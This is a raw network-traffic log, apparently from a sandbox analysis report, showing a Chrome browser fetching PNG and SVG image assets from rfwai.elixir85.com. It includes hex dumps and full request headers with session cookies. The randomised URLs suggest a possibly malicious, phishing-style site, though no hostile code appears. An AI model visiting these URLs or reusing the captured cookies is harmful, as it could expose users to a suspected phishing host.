                                                        2024-07-03 19:07:24 UTC722INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                        Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                        2024-07-03 19:07:24 UTC5INData Raw: 44 ae 42 60 82
                                                        Data Ascii: DB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        72192.168.2.549803104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1136OUTGET /kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC680INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UAgKCZ0bAu%2FOlrHU6w8quFnMx4Oxzru6YNe2bWkz863hBSwANfQI%2FHNZQLezuVadmeyDPPM9xqd0MYdIIfp%2B991W7u8O3FCuv%2F6fwvywovaS%2B8274ge%2BHYkYJbWcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928814c717cab-EWR
                                                        2024-07-03 19:07:24 UTC689INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                        Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                        2024-07-03 19:07:24 UTC1182INData Raw: 38 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22
                                                        Data Ascii: 84 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="
                                                        2024-07-03 19:07:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        73192.168.2.549804104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1136OUTGET /ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC666INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 1400
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnBZdvPXVoIq2rCVH14MbENfyUbcvcinuiIqQmgRGioVBe2jBeEvZVlcwh%2FVvUTz8F4kwL7j%2BluJ5nzScneNSOS18UgPz0EjutSsT%2F%2FkEY84J3acUYS2QU8JoDgYMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d928814a7b8c7e-EWR
                                                        2024-07-03 19:07:24 UTC703INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                        Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                        2024-07-03 19:07:24 UTC697INData Raw: cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03 01 73 a0 ff ad 2f
                                                        Data Ascii: Ite~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-s/


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        74192.168.2.549805104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1443OUTGET /mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC664INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2BTBdd71uf6KcsV6aZ2uiHhocYF54VrKXgQWuXplKwYhh%2B2rnEaSZThuUi700vH62%2BxUzMYrzMv97OIRZqOaMEWsykVh%2B9yZYazFgCBzfpiT7iFSTiL%2Fnh7C27Yw1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92881a91f425b-EWR
                                                        2024-07-03 19:07:24 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                        Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                        2024-07-03 19:07:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        75192.168.2.549806104.21.89.1434433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:07:23 UTC1431OUTGET /ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170 HTTP/1.1
                                                        Host: rfwai.elixir85.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
                                                        2024-07-03 19:07:24 UTC650INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:07:24 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F3AiGNKe9K97eseGwNTY21tCANkle%2B5q0G0gx6y2CFSblBnc3dUDP4BXuTO1M6u4yo9AOTZZfpKD8qo65%2B9Zo9%2FmICp%2BvyQtPM4vBcSJ90lQWMogodT2QMO5MFL0Ww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 89d92881bcee42e7-EWR
                                                        2024-07-03 19:07:24 UTC719INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                        Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                        2024-07-03 19:07:24 UTC1369INData Raw: 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39
                                                        Data Ascii: .2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19
                                                        2024-07-03 19:07:24 UTC1369INData Raw: 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32 20 31 36 2e 32 32 30 35 20 31
                                                        Data Ascii: .6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952 16.2205 1
                                                        2024-07-03 19:07:24 UTC1369INData Raw: 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 31 39 2e 36 30 30 39 20 34
                                                        Data Ascii: 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505L19.6009 4
